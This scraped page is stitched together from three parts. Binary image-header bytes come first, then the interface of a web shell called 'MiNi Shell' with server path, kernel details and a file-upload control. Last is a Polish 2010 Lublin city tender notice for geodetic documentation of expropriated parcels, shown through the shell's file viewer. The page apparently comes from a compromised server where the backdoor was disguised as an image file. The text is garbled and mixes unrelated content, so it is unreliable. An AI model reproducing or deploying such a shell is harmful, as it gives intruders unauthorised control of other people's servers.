JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100407/96366-N-2010.html

<p class="kh_header"><b>Lublin: Wykonanie opracowań dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych położonych na terenie miasta Lublin - XII części</b><br>
<b>Numer ogłoszenia: 96366 - 2010; data zamieszczenia: 07.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowań dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych położonych na terenie miasta Lublin - XII części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie opracowań dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych położonych na terenie miasta Lublin - XII części.
2.Zakres zamówienia obejmuje:
2.1 Część I - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Urzędu Miejskiego w Lublinie z dnia 12 czerwca 1976 r., znak: GTO.VII.6602/16/76, zgodnie z lokalizacją budowy osiedla mieszkaniowego RSM Motor, położonej w Lublinie,przy ul. Droga Męczenników Majdanka, oznaczonej uprzednio jako działka nr 48 o pow. 2792 m kw., stanowiącej obecnie części działek nr 81/1, 81/12, 82/2,81/8, 81/9, 81/10, 82/1 (obr. 11, ark.4) -  wykonanie dokumentacji dotyczy 	postępowania o zwrot nieruchomości na rzecz poprzednich właścicieli,
2.2. Część II - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydium Wojewódzkiej Rady Narodowej w Lublinie z dnia 8 listopada 1973 r., znak:GK.V.60/63/72, zgodnie z lokalizacją budowy węzła kolejowego Lublin,położonej w  Lublinie - Zadębie, oznaczonej uprzednio jako działka nr 79/4 o pow. 2948 m kw., stanowiącej obecnie część działki nr 106/2, (obr. 46, ark. 3) - wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na rzecz 	poprzednich właścicieli, 
2.3. Część III - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości nabytej na rzecz Skarbu Państwa aktem notarialnym z dnia 21 lutego 1977 r., Rep. A Nr 4022/77, zgodnie z lokalizacją rozbudowy klinik i zakładów teoretycznych Akademii Medycznej w Lublinie, położonej w Lublinie przy ul. Arnsztajnowej, oznaczonej uprzednio jako działka nr 1 o pow. 1568 m kw., stanowiącej obecnie część działki nr 32/6 (obr. 18, ark. 	14) - wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na 	rzecz spadkobierców poprzednich właścicieli,    
2.4. Część IV - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydenta Miasta 	Lublina z dnia 30 kwietnia 1977 r., znak: GTO.VII.8221/66/77, zgodnie z lokalizacją budowy osiedla mieszkaniowego Czechów, położonej w Lublinie w 	dzielnicy Czechów, oznaczonej uprzednio jako działka nr 61 o pow. 409 m kw., w części wchodzącej w skład aktualnych działek ewidencyjnych 5/10 i 5/20 (obr. 	5, ark. 3) - wykonanie dokumentacji dotyczy postępowania o zwrot 	nieruchomości na rzecz spadkobierców poprzednich właścicieli, 
2.5. Część V - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydenta Miasta 	Lublina z dnia 31 maja 1975 r., znak: GK.IV.6602/6/75, zgodnie z lokalizacją budowy obiektów dydaktyczno - naukowych Akademii Rolniczej w Lublinie, 	oznaczonej uprzednio jako działki o numerach 196/1 i 196/2 o łącznej 	powierzchni 6093 m kw, stanowiącej części działek oznaczonych obecnie numerami 225/11 i 226/5 (obr. 11, ark. 2) - wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na rzecz spadkobierców poprzednich właścicieli,   
2.6. Część VI - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydenta Miasta 	Lublina z dnia 3 marca 1977 r., znak: GTO-VII-6602/86/76, zgodnie z 	lokalizacja budowy osiedla mieszkaniowego SBM Czechów w Lublinie, oznaczonej uprzednio jako działka nr 8 o pow. 15568 m kw., stanowiącej części 	działek oznaczonych obecnie numerami 1/27, 8/2, 1/31 (obr. 6, ark. 5) - wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na rzecz poprzednich właścicieli,   
2.7. Część VII - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości nabytej na rzecz Skarbu Państwa aktem 	notarialnym z dnia 6 czerwca 1989 r., Rep. A Nr 14832/89, z przeznaczeniem 	pod skoncentrowane budownictwo jednorodzinne w osiedlu Węglin - Południe, oznaczonej uprzednio jako działka nr 30/10 o pow. 1113 m kw., 	stanowiącej część działki oznaczonej obecnie numerem 303 (obr. 30, ark. 13) - 	wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na 	rzecz poprzednich właścicieli,   
2.8. Część VIII - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości nabytej aktem notarialnym z dnia 20 grudnia 1967 r., Rep. A Nr 15099/67 z przeznaczeniem pod budowę Osiedla Piastowskiego oraz wywłaszczonej orzeczeniem PWRN w Lublinie z dnia 3 marca 1971 r., znak: SW.IV.60/158/69 z przeznaczeniem pod budowę osiedla 	mieszkaniowego, oznaczonej uprzednio jako działka nr 361, w części obejmującej działki oznaczone obecnie numerami 37/2 (obr. 28, ark. 2) i 173 	(obr. 28, ark. 2) - wykonanie dokumentacji dotyczy postępowania o zwrot 	nieruchomości na rzecz poprzednich właścicieli,
2.9. Część IX - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydenta Miasta 	Lublina z dnia 30 listopada 1983 r., znak: GT.VII.8221/37/80/83, zgodnie z lokalizacją budowy osiedla mieszkaniowego Łęgi, oznaczonej uprzednio jako 	działki o numerach 32 i 74 o łącznej powierzchni 2630 m kw., stanowiącej 	części działek oznaczonych obecnie numerami 266 i 267 (obr. 30, ark. 13) - wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na rzecz 	poprzednich właścicieli,     
2.10. Część X - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydenta Miasta 	Lublina z dnia 29 października 1979 r., znak: GT.VII.8221/33/79, zgodnie z lokalizacją budowy bazy prefabrykacji, położonej w Lublinie przy ul. Kasprowicza i ul. Grygowej, oznaczonej uprzednio jako działki nr 1/3, 2/2, 2/1 o łącznej powierzchni 3018 m kw., stanowiącej obecnie części działek nr 74 i nr 81 (obr. 46, ark. 9) - wykonanie dokumentacji dotyczy postępowania o zwrot 	nieruchomości na rzecz poprzednich właścicieli,
2.11. Część XI - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydium Wojewódzkiej Rady Narodowej w Lublinie z dnia 28 września 1973 r., znak: GK.V.60/125/73, zgodnie z lokalizacją budowy zespołu budynków Komendy 	Miejskiej MO w Lublinie, położonej w Lublinie przy ul. Północnej, oznaczonej uprzednio jako działka nr 19/2 o powierzchni 661 m kw., stanowiącej obecnie 	części działki nr 27/2 (obr. 18, ark. 14) - wykonanie dokumentacji dotyczy 	postępowania o zwrot nieruchomości na rzecz poprzednich właścicieli,
2.12. Część XII - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonej decyzją Prezydenta Miasta Lublina z dnia 31 maja 1975 r., znak: GK.IV-6602/6/75, zgodnie z lokalizacją budowy obiektów dydaktyczno - naukowych Akademii Rolniczej w Lublinie, w dzielnicy Felin, oznaczonej uprzednio jako działki nr 201 i nr 204 o łącznej powierzchni 4515 m kw., stanowiącej obecnie części działek o numerach 	225/11 i 225/15 (obr. 11, ark. 2) - wykonanie dokumentacji dotyczy postępowania o zwrot nieruchomości na rzecz poprzednich właścicieli.
3. Szczegółowy zakres zamówienia ( określony w pkt. 2.1 - 2.12.) obejmuje:
3.1. Etap I:
1) zgłoszenie prac geodezyjnych  w Miejskim Ośrodku 	Dokumentacji Geodezyjnej i Kartograficznej w Lublinie,
2) zebranie i analiza materiałów źródłowych,
3) badanie ksiąg wieczystych działek, których częścią  jest działka 	wywłaszczona,
4) przeprowadzenie w terenie wizji lokalnej przy udziale Zamawiającego oraz stron zainteresowanych zwrotem, w celu okazania granic działek wywłaszczonych,
5) aktualizacja mapy zasadniczej w zakresie instrukcji technicznej K-1 (dotyczy działki wywłaszczonej),
6) naniesienie na kserokopię mapy zasadniczej stanu użytkowania 	(orientacyjnie) oraz stanu wg. planu zagospodarowania,
7) opracowanie mapy ze szczegółowym rozliczeniem działki wywłaszczonej w nawiązaniu do istniejącej ewidencji gruntów,
3.2. Etap II będzie podlegał wykonaniu w przypadku wydania przez właściwy organ ostatecznej decyzji o zwrocie nieruchomości i obejmować będzie:
8) opracowanie mapy będącej podstawą do ujawnienia w ewidencji gruntów oraz w księdze wieczystej dokonanego zwrotu działki, po zakwalifikowaniu opracowania wg. pkt 7 (terminem wiążącym jest okres trzech lat od daty zawarcia umowy),
9) wprowadzenie zmian na mapie zasadniczej w związku ze zwrotem działki,
10) utrwalenie oraz okazanie punktów granicznych zwróconej działki byłym właścicielom ze spisaniem protokołu okazania,
11) w przypadku przedłużającego się okresu zwrotu działki Wykonawca zobowiązany jest do zaktualizowania dokumentacji geodezyjnej 	stosownie do obowiązującej w tym okresie ewidencji gruntów a ponadto zobowiązany jest do wykonania innych wersji dokumentacji do zwrotu nieruchomości, w przypadku zaistnienia takiej potrzeby (terminem 	wiążącym jest okres trzech lat od daty zawarcia umowy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia posiadającą wymagane uprawnienia uprawnienia zawodowe tj.: świadectwo uprawnień w dziedzinie geodezji i kartografii w zakresie rozgraniczania i podziałów nieruchomości oraz sporządzania dokumentacji do celów prawnych  nadane przez Głównego Geodetę Kraju w zakresie określonym w art. 43 pkt. 2 ustawy Prawo geodezyjne  i kartograficzne (t.j. Dz.U. z 2005 r. Nr 240, poz. 2027)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 
2.Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom  w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom.
3.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika.
4.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje  osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca - w przypadku osób fizycznych. 
5. W sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
6. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujace rodzaje i warunki zmiany treści umowy:
 1) zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto
 2) zmiana terminu wykonania któregoś z etapów dla danej części, w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie,
b) uniemożliwienia Wykonawcy dostępu do nieruchomości będącej przedmiotem opracowania geodezyjno-prawnego przez osoby trzecie, w których władaniu pozostaje ta nieruchomość,
c) zaistnienia niesprzyjajacych warunków atmosferycznych, uniemożliwiajacych wykonanie prac geodezyjnych w terenie
2. Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujacych warunkach:
1) ad pkt 1) - stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę;
2) ad pkt 2) - zmiana terminu wykonania któregoś z etapów dla danej części:
lit. a) - o okres działania siły wyższej oraz potrzeby usunięcia skutków tego działania,
lit. b) - o okres braku dostępu Wykonawcy do nieruchomości będącej przedmiotem wyceny,
lit. c) - o czas trwania niesprzyjających warunków atmosferycznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Pl.Litewski 1, pokój nr 12 po wcześniejszym dokonaniu wpłaty 5,00 zł w kasie UM Lublin,ul. Wieniawska 14 lub za zaliczeniem pocztowym (5,00 zł + koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 09:30, miejsce: Biuro Zamówień Publicznych UM Lublin, Pl.Litewski 1, pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia -  
Okres obowiązywania umowy: 3 lata od daty zawarcia umowy,
I etap: 3 miesiace od daty zawarcia umowy,
II etap: 30 dni kalendarzowych od dnia otrzymania informacji o ostatecznej decyzji o zwrocie nieruchomości
2. Osobami upoważnionymi do kontaktowania się z wykonawcami są:
2.1.W zakresie przedmiotu zamówienia: p. Małgorzata Zdunek - Wydział Gospodarowania Mieniem Urzędu Miasta Lublin Urzędu Miasta Lublin, ul. Wieniawska 14, piętro VII, pokój nr 712, telefon (081) 466-27-50, p. Paweł Misiec - Wydział Gospodarowania Mieniem Urzędu Miasta Lublin, ul. Wieniawska 14, piętro VII, pokój nr 711, telefon (081) 466-27-19.
2.2.W zakresie procedury: p. Anna Ziółkowska - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 12, telefon (081) 466-30-17.
3.Pełnomocnictwo, o którym mowa  w pkt III.6)3 i III. 6)4  powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji wynika z dokumentu rejestracyjnego wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach.
4.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: 4.1. oświadczenie o spełnieniu warunków udziału w postępowaniu oraz dokumenty z pkt III.3) winny być złożone wspólnie przez wykonawców. 
4.2. dokumenty wymagane w III.4)2. winien złożyć każdy wykonawca. 
5. Wszystkie dokumenty z pkt III.4) oraz dokumenty z pkt. III.6)5 i III.6)6 ogłoszenia winne być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci /za zgodność z oryginałem/. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. 
6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt III.6)6, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów winny być poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty. 
7. Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com